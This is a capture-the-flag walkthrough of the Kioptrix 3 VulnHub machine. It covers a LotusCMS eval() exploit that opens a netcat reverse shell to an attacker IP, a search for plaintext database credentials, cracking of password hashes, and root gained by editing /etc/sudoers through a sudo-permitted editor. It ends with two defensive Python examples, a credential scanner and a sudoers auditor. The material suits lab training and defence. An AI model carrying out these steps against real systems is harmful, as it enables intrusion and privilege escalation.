kioptrix3-VulnHub


This is the write-up for kioptrix3 from VulnHub.

This can be found at :- https://www.vulnhub.com/entry/kioptrix-level-12-3,24/

Download the VM and use the virtualization software of your choice to deploy the virtual machine.

Let's start, and keep in mind that the VM IP address may be different in your case.

Enumeration
===========
⇒ Nmap shows ports 22 and 80 open. Let's browse to http://192.168.56.106/
⇒ LotusCMS
⇒ LotusCMS 3.0 - 'eval()' Remote Command Execution

Exploit
=======
https://raw.githubusercontent.com/Hood3dRob1n/LotusCMS-Exploit/master/lotusRCE.sh
⇒ Path found, now to check for vuln....
</html>Hood3dRob1n
Regex found, site is vulnerable to PHP Code Injection!

About to try and inject reverse shell....
what IP to use?
192.168.56.102
What PORT?
9999

OK, open your local listener and choose the method for back connect:
1) NetCat -e 3) NetCat Backpipe 5) Exit
2) NetCat /dev/tcp 4) NetCat FIFO
#? 1

⇒ Got Reverse Shell
⇒ Stabilize Shell
    • python -c 'import pty;pty.spawn("/bin/bash")'
    • control+z to background
    • stty raw -echo
    • fg
    • export TERM=xterm
⇒ www-data@Kioptrix3:/home/www/kioptrix3.com$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Privilege Escalation
====================
⇒ www-data@Kioptrix3:/home/loneferret$ find / -perm -u=s -type f 2>/dev/null
    • /usr/local/bin/ht
⇒ www-data@Kioptrix3:/home/loneferret$ cat CompanyPolicy.README
    Hello new employee,
    It is company policy here to use our newly installed software for editing, creating and viewing files.
    Please use the command 'sudo ht'.
    Failure to do so will result in you immediate termination.

    DG
    CEO
⇒ /usr/local/bin/ht /etc/sudoers
    • # User privilege specification
    │root    ALL=(ALL) ALL
    │loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht

⇒ Find hard-coded passwords
    • find /home/www -type f -exec grep -Hn password {} \; 2>/dev/null
        ◇ Found MySQL credentials in /home/www/kioptrix3.com/gallery/gconfig.php
⇒ Log in to http://192.168.56.106/phpmyadmin/ with the above credentials.
    • Found users and password hashes in the dev_accounts table of the gallery database, for users “dreg” and “loneferret”
    • Cracked both hashes easily using https://crackstation.net/
⇒ Log in via SSH as user “loneferret” with the cracked password and run sudo -l
    • loneferret@Kioptrix3:~$ sudo -l
    User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht
    • Tried to edit the /etc/sudoers file with sudo /usr/local/bin/ht and got an error:
    ◇ Error opening terminal: xterm-256color.
    ◇ Searched for the error; the solution was to run “export TERM=xterm”
    ◇ Run sudo /usr/local/bin/ht /etc/sudoers again and add /bin/sh for user loneferret
    ◇ Run sudo /bin/sh ⇒ We get root shell
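The MySQL credentials above were recoverable because they sat in a plaintext config file inside the web root, readable by the web server's own account. The following is an added example (not part of the original write-up) of a small scanner a defender could run over a document root to catch that class of mistake before an attacker does. The file tree, paths and values are constructed for the example; the `gconfig.php` path is the one from the write-up, but its contents here are made up. It flags quoted literals assigned to password-like keys and ignores values pulled from the environment, and it redacts what it finds so the report itself does not leak the secret.

```python
import re

# Constructed sample tree: a few PHP files as they might sit under a web root.
# Only the path of gconfig.php follows the write-up; every value is invented.
SAMPLE_TREE = {
    "/home/www/kioptrix3.com/gallery/gconfig.php": """<?php
$GLOBALS["gallarific_mysql_server"] = "localhost";
$GLOBALS["gallarific_mysql_username"] = "gallery";
$GLOBALS["gallarific_mysql_password"] = "examplepw";
?>""",
    "/home/www/kioptrix3.com/gallery/db.inc.php": """<?php
define('DB_HOST', 'localhost');
define('DB_PASSWORD', 'changeme');
?>""",
    # A hardened variant: the secret comes from the environment, not the file.
    "/home/www/kioptrix3.com/gallery/config.example.php":
        '<?php $db_pass = getenv("GALLERY_DB_PASS"); ?>',
    "/home/www/kioptrix3.com/index.php": "<?php echo 'hello'; ?>",
}

# Key names that usually hold a secret (hypothetical list for this example).
CRED_KEY = re.compile(r"(pass(word|wd)?|pwd|secret|token|api_?key)", re.I)

# $var = "literal";  /  'key' => 'literal'  /  key: "literal"
ASSIGN_RE = re.compile(
    r"""(?P<key>[\w\[\]"'$]+)\s*(?:=>|=|:)\s*(?P<q>["'])(?P<val>.*?)(?P=q)""")
# define('KEY', 'literal');
DEFINE_RE = re.compile(
    r"""define\(\s*(?P<dq>["'])(?P<key>\w+)(?P=dq)\s*,\s*(?P<q>["'])(?P<val>.*?)(?P=q)""")


def redact(value):
    """Keep two characters so the finding can be matched to the file, hide the rest."""
    return value[:2] + "*" * max(len(value) - 2, 0)


def scan_tree(tree):
    """Return one finding per quoted secret literal found under the tree.

    tree maps file path -> file contents (constructed here; a real run would
    walk the filesystem instead)."""
    findings = []
    for path, content in tree.items():
        for lineno, line in enumerate(content.splitlines(), 1):
            for pattern in (ASSIGN_RE, DEFINE_RE):
                m = pattern.search(line)
                # A literal assigned to a password-like key is the problem;
                # getenv(...) and empty strings are not matched by the regex.
                if m and CRED_KEY.search(m.group("key")) and m.group("val"):
                    findings.append({
                        "path": path,
                        "line": lineno,
                        "key": m.group("key"),
                        "value": redact(m.group("val")),
                    })
                    break
    return findings


if __name__ == "__main__":
    for f in scan_tree(SAMPLE_TREE):
        print(f"{f['path']}:{f['line']}: {f['key']} = {f['value']}")
```

Anything the scanner reports should be moved out of the document root (or into environment variables or a secrets store) and the database account given only the rights the gallery needs, since a reusable admin login to phpmyadmin is what turned one config file into access to every user's password hash.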
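The root shell at the end of this section comes entirely from the sudoers rule shown earlier: `ht` is an editor, so running it as root means the user can rewrite any file, including `/etc/sudoers` itself, and the `!/usr/bin/su` entry denies nothing that matters. As an added example (not code from the write-up), here is a small sudoers auditor that parses user-specification lines and flags exactly that pattern. The vulnerable input is the rule from the box; the hardened variant using `sudoedit` is a constructed replacement, and the list of file-writing or shell-spawning programs is a hypothetical starting point rather than a complete catalogue.

```python
import os
import re

# Sample sudoers content. The vulnerable rule is the one the write-up shows on
# the box; the hardened variant is a constructed replacement for comparison.
SUDOERS_VULNERABLE = """\
# User privilege specification
root\tALL=(ALL) ALL
loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht
"""

SUDOERS_HARDENED = """\
root\tALL=(ALL) ALL
# sudoedit copies the file aside, runs the editor as the invoking user and
# writes back only that file, so the editor itself never runs as root.
loneferret ALL=(root) sudoedit /etc/motd
"""

# user  host=(runas) [TAG:] cmd, [TAG:] cmd, ...
SPEC_RE = re.compile(r"^(\S+)\s+(\S+)\s*=\s*(?:\(([^)]*)\)\s*)?(.*)$")
TAG_RE = re.compile(r"^((?:[A-Z]+:\s*)+)")

# Programs that, run as root, can write arbitrary files (e.g. /etc/sudoers) or
# drop to a shell. Hypothetical list for this example, not an exhaustive one.
WRITE_OR_SHELL = {"ht", "vi", "vim", "nano", "emacs", "less", "more", "sh",
                  "bash", "dash", "python", "perl", "find", "awk"}


def parse_sudoers(text):
    """Return one dict per (user, command) pair from the user-specification lines."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(("Defaults", "Cmnd_Alias", "User_Alias",
                                         "Host_Alias", "Runas_Alias")):
            continue
        m = SPEC_RE.match(line)
        if not m:
            continue
        user, host, runas, cmnd_list = m.groups()
        tags = set()  # a tag stays in force for the commands that follow it
        for item in cmnd_list.split(","):
            item = item.strip()
            t = TAG_RE.match(item)
            if t:
                tags = {tok.rstrip(":") for tok in t.group(1).split()}
                item = item[t.end():].strip()
            negated = item.startswith("!")
            item = item.lstrip("!")
            if not item:
                continue
            rules.append({"user": user, "host": host, "runas": runas or "root",
                          "tags": set(tags), "negated": negated,
                          "cmd": item.split()[0]})
    return rules


def audit_sudoers(text):
    """Flag rules that grant more than a file-specific edit or a single command."""
    findings = []
    for r in parse_sudoers(text):
        if r["user"] == "root":
            continue
        if r["negated"]:
            findings.append({"severity": "info", "user": r["user"], "cmd": r["cmd"],
                             "reason": "'!' excludes only this exact path; it does not "
                                       "limit what the other permitted commands can do"})
            continue
        base = os.path.basename(r["cmd"])
        if r["cmd"] == "ALL" or base in WRITE_OR_SHELL:
            severity = "high"
            reason = (f"{base} running as {r['runas']} can rewrite any file "
                      f"(including /etc/sudoers) or spawn a shell")
            if "NOPASSWD" in r["tags"]:
                reason += ", without even a password prompt"
        elif "NOPASSWD" in r["tags"]:
            severity = "medium"
            reason = "passwordless sudo: a hijacked session is enough to use it"
        else:
            continue
        findings.append({"severity": severity, "user": r["user"],
                         "cmd": r["cmd"], "reason": reason})
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SUDOERS_VULNERABLE):
        print(f"[{f['severity']}] {f['user']}: {f['cmd']} -> {f['reason']}")
```

Run against the box's rule the auditor reports the `ht` entry as high and the `su` exclusion as informational; the `sudoedit` variant produces no findings, because the privileged part of the operation is limited to copying one named file back into place.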

